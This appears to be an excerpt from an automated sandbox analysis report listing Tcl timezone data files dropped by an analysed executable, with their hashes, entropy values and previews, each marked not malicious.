                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Palmer) {.. {-9223372036854775808 0 0 -00}.. {-157766400 -14400 0 -04}.. {-152654400 -14400 0 -04}.. {-132955200 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-101419200 -10800 1 -04}.. {-86821200 -14400 0 -04}.. {-71092800 -10800 1 -04}.. {-54766800 -14400 0 -04}.. {-39038400 -10800 1 -04}.. {-23317200 -14400 0 -04}.. {-7588800 -10800 0 -03}.. {128142000 -7200 1 -03}.. {136605600 -10800 0 -03}.. {389070000 -14400 0 -04}.. {403070400 -10800 1 -04}.. {416372400 -14400 0 -04}.. {434520000 -10800 1 -04}.. {447822000 -14400 0 -04}.. {466574400 -10800 1 -04}.. {479271600 -14400 0 -04}.. {498024000 -10800 1 -04}.. {510721200 -14400 0 -04}.. {529473600 -10800 1 -04}.. {545194800 -14400 0 -04}.. {560923200 -10800 1 -04}.. {574225200 -14400 0 -04}.. {592372800 -10800 1 -04}.. {605674800 -14400 0 -04}.. {624427200 -10800 1 -04}.. {63712
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):151
                                                                                                                                                                                                                                            Entropy (8bit):4.829975802206526
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEsKRsMXGm2OHvavFN/H3VVFVGAvFv:SlSWB9eg/2L0rRsDm2OHEN/VVFAKV
                                                                                                                                                                                                                                            MD5:C330982049AA053DA62B926627D2F2FA
                                                                                                                                                                                                                                            SHA1:050CE68265F1A183F0173C825AC59EAE8B6AB9EB
                                                                                                                                                                                                                                            SHA-256:943F10D8E836773F0B7ACD13ED8422C0B27813C7BBE0B09B57697D1D70D21ECE
                                                                                                                                                                                                                                            SHA-512:DE9953D0E505D6B110C0CC4E756B5B0311646C9CA4703A33B92147D36CFB4C288D73851E6766CE1432F41AB51B5D0A1D58680BDB4E28F067E1D36F670B4A192E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Rothera) {.. {-9223372036854775808 0 0 -00}.. {218246400 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                                                            Entropy (8bit):4.906125935761354
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0tlo+ply:MByMdTiYt2LMq+p8
                                                                                                                                                                                                                                            MD5:8095A3749DBDE05377836D74A4EEFE33
                                                                                                                                                                                                                                            SHA1:6987CA972B63AE26A65654961588D51D3EF2166C
                                                                                                                                                                                                                                            SHA-256:88057832175BB642B23FC99F788A2F78A24005CF1F84A7B1B5E8C84FB8F4D4C1
                                                                                                                                                                                                                                            SHA-512:9066104C9C16D2AB88523D651C74CE268468E093A497D128D0D12A986BD62DBC1388A56ED1737C2AFACF04185CF06FD0EE66797A3390B2F0E1EB08A4D92AAFAD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.871844665431957
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2L0GRHEtWlFBQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2L0tQB
                                                                                                                                                                                                                                            MD5:CA52057130DCF506D11A7CC069F4FBA3
                                                                                                                                                                                                                                            SHA1:2C38B7E7872BB41C3569DFCB539C3EC3AAE24FDD
                                                                                                                                                                                                                                            SHA-256:2488805DE4FEA42305689F679F1AE2D80B1E934E657FEA329AD39A82DAC63022
                                                                                                                                                                                                                                            SHA-512:B19D409870939C8F0834C6C028239E010EE5128DFA6E97D4903BECA229B04FE530EA376B936767D9BFE21709720C1791289D8E3622B17C18F2680B0670794A02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Antarctica/Syowa) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5370
                                                                                                                                                                                                                                            Entropy (8bit):3.5134546899897146
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:YveRdmbxnKIJqU9XThVIsopb8BcrFgoZVlzeEG+PtJ:UeRdmNnKIIajfopb3FVVJ
                                                                                                                                                                                                                                            MD5:442F495C36B31CA5D7A9BEFF12105AEF
                                                                                                                                                                                                                                            SHA1:B3F6CA5B4A5756F9B2C09A27198F7A651CC6032D
                                                                                                                                                                                                                                            SHA-256:6FD5AB8B7B308CDCEA4B747A81D8675988AE218813C91714FC4CA97919CEBEA5
                                                                                                                                                                                                                                            SHA-512:C6EAECC26D67D218615EBB5602639DAB62A2578BD9683553D765DC1AC5580627D29B6F911388F5F1BFC284278EA4EBECE94630D3C6B95FF9EF93D3D61A3C2028
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Troll) {.. {-9223372036854775808 0 0 -00}.. {1108166400 0 0 +00}.. {1111885200 7200 1 +02}.. {1130634000 0 0 +00}.. {1143334800 7200 1 +02}.. {1162083600 0 0 +00}.. {1174784400 7200 1 +02}.. {1193533200 0 0 +00}.. {1206838800 7200 1 +02}.. {1224982800 0 0 +00}.. {1238288400 7200 1 +02}.. {1256432400 0 0 +00}.. {1269738000 7200 1 +02}.. {1288486800 0 0 +00}.. {1301187600 7200 1 +02}.. {1319936400 0 0 +00}.. {1332637200 7200 1 +02}.. {1351386000 0 0 +00}.. {1364691600 7200 1 +02}.. {1382835600 0 0 +00}.. {1396141200 7200 1 +02}.. {1414285200 0 0 +00}.. {1427590800 7200 1 +02}.. {1445734800 0 0 +00}.. {1459040400 7200 1 +02}.. {1477789200 0 0 +00}.. {1490490000 7200 1 +02}.. {1509238800 0 0 +00}.. {1521939600 7200 1 +02}.. {1540688400 0 0 +00}.. {1553994000 7200 1 +02}.. {1572138000 0 0 +00}.. {1585443600 7200 1 +02}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.940298769001579
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2L0GRHEoKcMFeWFKjov:SlSWB9vsM3yMGSHAIgvAN/2L0XcMFewh
                                                                                                                                                                                                                                            MD5:F61B4D02530B54A8EB1CA7B34BF6D553
                                                                                                                                                                                                                                            SHA1:EB85E044EF9F7D11310C5EBB8D1D0C49A1E3067F
                                                                                                                                                                                                                                            SHA-256:1892E98C13AC141C8C92EAB942B073A464BA5E2C000C250F97F860BE6B108127
                                                                                                                                                                                                                                            SHA-512:E725E909A4056B7E4FADBE66B69E6C4752595F3357E670A7D740A2DA957F2C9502ECA57B9BA874045ED032B8F65A10D11AFAF69EA9673187FD4AE08793492470
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Antarctica/Vostok) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.947168975083595
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2XbeLo4cA4FH/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2XbUyAH
                                                                                                                                                                                                                                            MD5:A4F076D7D716467B78EA382FA222CB38
                                                                                                                                                                                                                                            SHA1:21D7FBA308ADC652F541A0336929B862F7B1BD0B
                                                                                                                                                                                                                                            SHA-256:25462B656D240DA6B01C1A630FAC04B25DD65C799B659BE1C8BD3AB62610966F
                                                                                                                                                                                                                                            SHA-512:1B6BD455E533D5BDC7F3506561A9CA804B1F9CA5CC0665AAB0FC083106AB32FF149DD5FFF62EF7BABAD87E3274F264446D492FB8BE160C9C7F281C7060BF1F61
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                                                            Entropy (8bit):4.829666491766117
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFK4h4WFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKs46
                                                                                                                                                                                                                                            MD5:60D7F3194F19179E0CF0F561F9C40EE6
                                                                                                                                                                                                                                            SHA1:B079EC49485CFBFFB7A5BE6149319B75684258E9
                                                                                                                                                                                                                                            SHA-256:8FCDDB246932BAED880B70C0CA867057E7989AEA55EDDC174430E1055CD1058D
                                                                                                                                                                                                                                            SHA-512:0BDC86B1D473D4875C6F7C092F955D0999E6C1F2EF83CFC7726A3C5BFEB0F5CB8E00B1F0CBC1F91F806EC635C472927504DF681A32DAC55EF372DA16FEA9EF40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Aden) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1637
                                                                                                                                                                                                                                            Entropy (8bit):3.732051305399264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5qehddmvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10SvPFu+a+CK/Eu3CWuD0Vob1:5YvdJqxiF0rvK50Sv9fGSM
                                                                                                                                                                                                                                            MD5:D6BCB21F65642F36A159AFD72EC93953
                                                                                                                                                                                                                                            SHA1:D3E670E579924E6E4F04AB574D48334FF521D8B2
                                                                                                                                                                                                                                            SHA-256:06DC608C0B8CDD69CCE66A6BF86F141C46DF39CB45312E684E46F19ED8CAFF15
                                                                                                                                                                                                                                            SHA-512:9A633B629873E5EE5AF923A94865EBE5FD9ECA181B2C47B7368A0828468715E07AD3FD825D5E2312D2D0BA1FA5490E3817C36B6339824C8012A0B75538C4A0DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Almaty) {.. {-9223372036854775808 18468 0 LMT}.. {-1441170468 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {695768400 21600 0 +06}.. {701812800 25200 1 +06}.. {717537600 21600 0 +06}.. {733262400 25200 1 +06}.. {748987200 21600 0 +06}.. {764712
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2682
                                                                                                                                                                                                                                            Entropy (8bit):3.7873260611521915
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5MUNHl0Nhb9bGA9jSb0PWtsjOuH7Ay2n3yy7QYoTZg703q4oPuJ9/YXjpdaOP9kA:Fz0T52akyId7+xOXdkwqeIFcR
                                                                                                                                                                                                                                            MD5:7E70BD44FBF5BF70E3C5246D3A83A49B
                                                                                                                                                                                                                                            SHA1:10A28B0A3189DF347CF9853C024E9467CAC56DBA
                                                                                                                                                                                                                                            SHA-256:B70AABECACD3F62AF506DF395AB44F47F2CA091522B04EC87AC1407172DD1BFA
                                                                                                                                                                                                                                            SHA-512:766565F837EB777749B2C8AAE6C73A2274A772CEF12E7C2E30A89809FEF1E9ED6B067DF044A4676AA4BE76A64A904692C3887336BF01BA4D5D9A5020FB792938
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Amman) {.. {-9223372036854775808 8624 0 LMT}.. {-1230776624 7200 0 EET}.. {108165600 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {215643600 7200 0 EET}.. {231285600 10800 1 EEST}.. {244501200 7200 0 EET}.. {262735200 10800 1 EEST}.. {275950800 7200 0 EET}.. {481154400 10800 1 EEST}.. {496962000 7200 0 EET}.. {512949600 10800 1 EEST}.. {528670800 7200 0 EET}.. {544399200 10800 1 EEST}.. {560120400 7200 0 EET}.. {575848800 10800 1 EEST}.. {592174800 7200 0 EET}.. {610581600 10800 1 EEST}.. {623624400 7200 0 EET}.. {641167200 10800 1 EEST}.. {655074000 7200 0 EET}.. {671839200 10800 1 EEST}.. {685918800 7200 0 EET}.. {702856800 10800 1 EEST}.. {717973200 7200 0 EET}.. {733701600 10800 1 EEST}.. {749422800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2086
                                                                                                                                                                                                                                            Entropy (8bit):3.7698340044911616
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5DeEdVrEOeFt7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5ZejsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                                            MD5:6EFC35043BDCA4AB61D72E931DB954E6
                                                                                                                                                                                                                                            SHA1:F0B4E76C154DC773073E41AA8E94030E972A986A
                                                                                                                                                                                                                                            SHA-256:D9DF64FDA4638F7604624B0F68A885D5ABADB1DE12AF1AF5581C2AF7DD971562
                                                                                                                                                                                                                                            SHA-512:16AE582B113D6960C73B64620A8AF20F9D436AA4B3EC8E881617AED3389EB4357931882103F162F19EE8202953A7E6FB4FDD6D7760FB7621F4DB9D229AD13F17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Anadyr) {.. {-9223372036854775808 42596 0 LMT}.. {-1441194596 43200 0 +12}.. {-1247572800 46800 0 +14}.. {354884400 50400 1 +14}.. {370692000 46800 0 +13}.. {386420400 43200 0 +13}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1665
                                                                                                                                                                                                                                            Entropy (8bit):3.7149890651919644
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5uvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIkhYwr:sFBNKs6b03zB0WJEuDa7sFZiKWaN6TiF
                                                                                                                                                                                                                                            MD5:A72FB1FE01C93BD7E0A8136635C72639
                                                                                                                                                                                                                                            SHA1:2383CF839F50784D4BF8B7EDDB324C80E2DDD0DC
                                                                                                                                                                                                                                            SHA-256:96B510AF9B8C6BC1DFA84E9ED5E072F3FD484EEB66BBEBC7B6826ED859ED9027
                                                                                                                                                                                                                                            SHA-512:061FECE3C750C0229638DD8AF38FB3E8E48E59E0DE1B13BCFE46483A7A170B71B9BCB0D6F110B6B2EF68510FA940F9066F14CBD59829E222D6644D3657CE1893
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtau) {.. {-9223372036854775808 12064 0 LMT}.. {-1441164064 14400 0 +04}.. {-1247544000 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {7647156
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1666
                                                                                                                                                                                                                                            Entropy (8bit):3.721746335201775
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5FUvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQR:PwaBNKs6b03zB0WJEuDa7sFZiKWaN6Tt
                                                                                                                                                                                                                                            MD5:E278B985BD2515DBCAED8CB741BE9208
                                                                                                                                                                                                                                            SHA1:BC9F5E72C430661D7ED1AF04571CE5D0F73DD18D
                                                                                                                                                                                                                                            SHA-256:991638FA2AB2A2F7A091A23D78D99306EE73A740F1A03FBAC448EDCAB55A0E38
                                                                                                                                                                                                                                            SHA-512:9951DB729B837647CC4B3D2E605525DCCBAFFD39D76460331BF62235DCAE5E4470CDA578F940B1739AABFEC55D293FF60D79AE0EFDFE1EB64E84571881FDEA6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtobe) {.. {-9223372036854775808 13720 0 LMT}.. {-1441165720 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                            Entropy (8bit):3.937249024843323
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5ggeRMdIQvNcDvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKTob3CGcr:5gbkvNSvNhQQvmRKqv0fvzQIovWdvEGD
                                                                                                                                                                                                                                            MD5:259179C7A1CA04F9F3A373B6C8FCB8C5
                                                                                                                                                                                                                                            SHA1:D042DF8EFD8EC1473B45B1131BD5EB714F1B2C17
                                                                                                                                                                                                                                            SHA-256:13745BFA25E6E2D8D0FABAE42CB7C37CF9F974CFB343D4FE84E4E2D64A25926B
                                                                                                                                                                                                                                            SHA-512:703BEAD5A1E5B3816D98057A08A87C2139F418787F38561FE35175B84E2005365727F85D1B949CC5DF464B207A7D01BB65FB1A632E73DDA523E843B82D76FBBD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ashgabat) {.. {-9223372036854775808 14012 0 LMT}.. {-1441166012 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +05}.. {370720800 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.801820439218014
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8xEYM4DyXHAIgN/ZEYovFvWARL/2WFKUNSH+WFKYEQ:SlSWB9vsM3yR+HAIgH8VWAN/2wKUNSeq
                                                                                                                                                                                                                                            MD5:5193EF7ADB646798801245BC50C8DDA6
                                                                                                                                                                                                                                            SHA1:83ED851CBC60EFB330A8FC119E1BED5B4C0BA630
                                                                                                                                                                                                                                            SHA-256:2C752F641B98E3C05B14AE31330D1F198DAA4A7E354BA9670C7754926BFB891A
                                                                                                                                                                                                                                            SHA-512:E940E1BE67A9AC895F3D060B1CB34797A429147A9DC2AC0F1162D37D86661EF217EDABA720F0AE3796186FE801229210AC785BB4511CBBE5A41791D236101D8C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ashgabat)]} {.. LoadTimeZoneFile Asia/Ashgabat..}..set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1666
                                                                                                                                                                                                                                            Entropy (8bit):3.7265766742957402
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:55TvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQJ:XrFBNKs6b03zB0WJEuDa7sFZiKWaN6Tl
                                                                                                                                                                                                                                            MD5:0236793F90ABC6F68718DDBB44AF5E2F
                                                                                                                                                                                                                                            SHA1:A5EFAEEF9B9159E748A3FED231F8A978E400482E
                                                                                                                                                                                                                                            SHA-256:4B7B118E6AE72D41740CF0CB2BD8E970700758DCBC0DD6F298199D841DF8408E
                                                                                                                                                                                                                                            SHA-512:851C7A9C110790454312BB9C5B5D3C426365EEF4673191B9ABB2E4A32301894C5FB1ADCBE2A4C67BEE416AD63FB8BED85F94EF9BF42473DA4BFFA7824935A1D5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Atyrau) {.. {-9223372036854775808 12464 0 LMT}.. {-1441164464 10800 0 +03}.. {-1247540400 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764715
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1702
                                                                                                                                                                                                                                            Entropy (8bit):3.7261419515679393
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5/eVvyGiHD6UC4UrUomFMmUZcjbUKNFcUEUvUOpU8MYUWCUlbf/U9bUiUUybUQUF:5m8G9mFdnNF1FfsTuvQXHCe
                                                                                                                                                                                                                                            MD5:690013310A46BD1AE250A5E019353809
                                                                                                                                                                                                                                            SHA1:0DF434C7EEB707DC071007FAB112F4DEB37E936F
                                                                                                                                                                                                                                            SHA-256:D20B75D2604C3B742C1629C5EE02CFF6783E472249982B272B68F2A6DE9BDC38
                                                                                                                                                                                                                                            SHA-512:FF8C33E55E4F006C38D3FD37A1AD3E1200718CA374ECBEAE8255C7635912F0BB23A59A600BF7130D5660A24C515F726E8440D0D908E560CB59F74059638E6AA2
                                                                                                                                                                                                                                            Malicious:false
